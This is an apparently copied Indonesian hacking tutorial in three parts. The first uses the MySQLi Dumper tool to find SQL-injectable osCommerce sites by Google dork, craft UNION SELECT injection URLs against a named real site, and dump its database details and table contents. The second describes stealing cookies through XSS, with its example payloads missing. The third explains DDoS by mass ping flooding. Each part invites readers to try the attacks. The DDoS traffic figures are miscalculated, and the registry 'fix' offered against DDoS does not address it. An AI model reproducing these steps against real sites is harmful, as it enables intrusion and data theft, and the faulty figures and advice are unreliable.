MySQLi Dumper

Mungkin ada yang masih bingung bagaimana menggunakan MySQLi dumper, kali ini kita akan mencoba membahasnya.
Jika ada yang belum tahu apa itu MySQLi dumper, silahkan masuk ke sini .
1.Bagian scanner.(untuk mencari target)
Untuk mencari target, masukkan dork di textbox di bawah tab Scanner, kita juga bisa memilih search Engine yang kita inginkan, kita bisa menggantinya, klik saja box yang ada disamping texbox untuk dork.
Kali ini kita mencoba menggunakan google.
Dengan dork "customer_testimonials.php?testimonial_id="
Nah, untuk mengatur jumlah page yang akan diload untuk mencari target,kita bisa mengaturnya pada "Search Pages (Approx):
Jika pengaturan sudah selesai, sekarang waktunya mencari target, kita tinggal klik tombol "Start Scann Link"

Beberapa saat kemudian, tunggu sampai proses selesai, targetpun akan muncul, belum apa apa saja, saya sudah mendapat 477 target, itu pun saya tidak menunggu sampain proses scanning selesai.

2.Untuk menscan target yang vuln SQLi , kita masuk ke tab "Vuln. SQL" lalu kita klik tombol "Start cann SQLi"
Tapi tunggu dulu, pada bagian "Spy word to check source SQL...bla..bla...bla" kita bisa menambahkan kata lain agar target yang didapat lebih memuaskan.
saya menabahkan kata lain sehingga menjadi:

sql syntax;sql erro;right syntax to use near;Warning: mysql_num_rows();You have an error in your SQL syntax;Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in;

Kita juga bisa mengganti SQLi-Inject Code dengan ' (quote)

Sekarang kitamulai scan.
Tunggu sampai proses selesai.
Nah, targetnya sudah kelihatan, saya mendapat 3 target yangvuln SQLi.
Sekarang waktunya kita scan jumlah kolom yang ada di web tersebut, misal target saya adalah
"http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3"

3.Untuk mencari jumlah kolom, masuk ke tab "Num.Blind"
Sekarang masukkan target ke textbox paling atas, namun sebelumnya tambahkan - setelah =
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3
Sekarang kita klik "Get Page"

Nah, keluar "The used SELECT statements have a different number of columns"
Berarti jumlah kolomnya salah, karena ini bug osCommerce maka kemungkinan jumlah kolomya diatas 7, jadi kita ganti angka 2 pada box di samping tombol "Get Page" dengan angka 7.
Ternyata error sama "1222 - The used SELECT statements have a different number of columns"
Kita coba angka 8, w00t w00t...error tidak terlihat dan keluar angka 3,4,dan 6.

Sekarang kita copy url pada text box disamping tombol "Get Page Manually"
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8--
lalu kita gantikan angka yang keluar dengan [t]
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8--

4.Sekarang kita masuk ke tab Dump MySQL.
Pada bagian inilah yang seru, kita bisa melihat database, table, column, serta data yang ada di column tersebut.
Copy url tadi ke textbox yang paling atas
http://www.scootsusa.com/customer_testimonials.php?testimonial_id=-3/**/union/**/all/**/select/**/1,2,[t],4,5,6,7,8--

Pada bagian setup kita bisa mengatur jumlah data yang dapat kita ambil, Kita atur saja pada bagian "Max. Pages", kali ini saya membatasi 5000 page yang akan di load.
Jika sudah diatur, sekarang klik "Get Info" untuk mengetahui versi database version, server, dan user()

Nah, disitu sudah terpampang:

Version():5.0.67.d7-ourdelta-log
Server:Apache
User():OSC_Test5_0@64.202.163.143

Karena Version(): 5, maka kita dapat melihat nama database, table, column, serta data yang ada di web tersebut dengan mudah.
Sekarang klik "Get Data Base" beberapa saat kemudian, nama database yang ada di situs tersebutpun akan muncul,

Nah terlihat bahwa ada 2 database:
1.information_schema
2.OSC_Test5_0
Kita pilih OSC_Test5_0, kenapa bukan information_schema ?? karena tdatabase ini bukan database yang digunakan oleh cms pada web tersebut, yaitu osCommerce
Lalu klik "Get Tables"
Daftar table sudah muncul (hanya sedikit karena saya tidak menunggu sampai proses selesai)
Misalkan kita memilih table "banner", kita tinggal klik table tersebut lalu klik tombol "Get Columns"

Daftar column sudah ada:
Columnnya:
banners_group
banners_html_text
banners_id
banners_image
banners_title
banners_url
date_added
date_scheduled
date_status_change
expires_date
expires_impressions
status

Sekarang kita blok column yang ingin kita dump datanya, gunakan ctrl sembari mengklik column yang diinginkan, jika ingin me-dump lebih dari 1 kolom.
Jika sudah memilih, klik "Dump data (Selected Columns)"

Nah, proses dump berhasil:
banners_id banners_url status
1 http://www.oscommerce.com 0

Dengan keterangan:
banners_id= 1
banners_url= http://www.oscommerce.com
status= 0
Sekian dulu tutorial kali ini.Untuk MySQLi Dumper untuk version():4 akan dibahas lain waktu.
Selamat mencoba.
SUMB : DISINI

CROSE SITE (XSS)

Apakah XSS vulnerability itu??
Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site

Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker
untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika

melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga

seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya

digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya

Caranya nggak susah-susah amat, anda hanya perlu menggunakan browser anda untuk memanfaatkan vuln ini. Contoh mudah2an aja masih bisa di XSS adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=

untuk mengetes apakah situsnya masih bisa di XSS anda bisa menambahkan setelah kata=



http://www.malesbanget.com/kamus/definisi.php?kata=

kemudian tekan enter …
kemudian akan muncul popup baru berisi ‘Tes, XSS-nya masih bisa’

Terus … ???
Masih banyak tag html yang bisa kita gunakan, tanya deh mamang Google.

contoh lainnya adalah :

http://www.malesbanget.com/kamus/definisi.php?kata=
SUMB : DISINI

DOS

Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan ...
situs nya tidak bisa di akses selama beberapa jam.
Yang terbaru adalah situs milik JATIM CREW yang sempat kena serangan ddos beberapa waktu yang lalu.namun sang penyerang tak begitu senang,karena pihak JATIM CREW juga melakukan serangan ddos balik yang mengakibatkan web penyerang tidak dapat di akses sama sekali sampai saat ini



Bagaimana cara kerja DDOS ?

Jika Anda memakai program windows , coba lakukan ini di komputer Anda.

1. Start , Programs , Accessories , Command Prompt
2. Kemudian di Command prompt ketikan , Ping -t www.situsyangdituju.com

atau bisa juga Start, Run , Ping -t www.situsyangdituju.com

Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan “Halo , apa ada orang di situ ? ” , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : “ya, di sini ada orang”

Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

adapun cara lain yang bisa di gunakan yaitu dengan menggunakan tools.atau juga bisa menggunakan shell.

Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.

Adapun cara yang dapat di lakukan untuk mengatasi ddos tersebut yaitu :
masuk ke menu Run di komputer anda kemudian ketikkan Regedit ->
1. HKEY_LOCAL_MACHINE
2. SOFTWARE
3. Microsoft
4. UPnP Device Host atau UPnP Control Point
5. Pada sisi sebelah kanan, klik kanan New - DWORD Value berikan nama DownloadScope dan beri nilai 3.
6. Masuk ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SSDPSRV\Parameters and klik new - dword dan beri nama TTL lalu beri dengan nilai 30. Tutup regedit anda, dan restart komputer.

ok Selamat mencoba.
satu pesan aja dari saya
dalam dunia maya itu gag ada yang aman 100% sama sekali,semua pasti ada celahnya.
sumb : disini